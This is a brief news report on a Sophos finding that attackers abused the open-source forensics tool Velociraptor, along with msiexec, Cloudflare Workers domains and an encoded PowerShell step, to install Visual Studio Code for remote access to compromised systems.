Cybersecurity researchers have uncovered a new cyberattack in which hackers used a legitimate open-source security tool called Velociraptor to carry out malicious activities.
According to a report from the Sophos Counter Threat Unit, the unknown threat actors used Velociraptor to download and run widely-used code editor Visual Studio Code likely to create a secret communication tunnel to a command-and-control (C2) server.
While attackers commonly rely on legitimate tools in so-called “living-off-the-land” (LotL) techniques, this case shows a shift. Instead of deploying malware directly, the attackers used Velociraptor, typically employed in digital forensics and incident response, to gain control of compromised systems.
The researchers found that the attackers used the Windows utility msiexec to download an installer from a Cloudflare Workers domain. The installer set up Velociraptor, which then connected to another Cloudflare Workers domain. From there, the attackers downloaded Visual Studio Code using an encoded PowerShell command, enabling remote access and potential code execution.
Further malicious tools were also downloaded using the same msiexec method.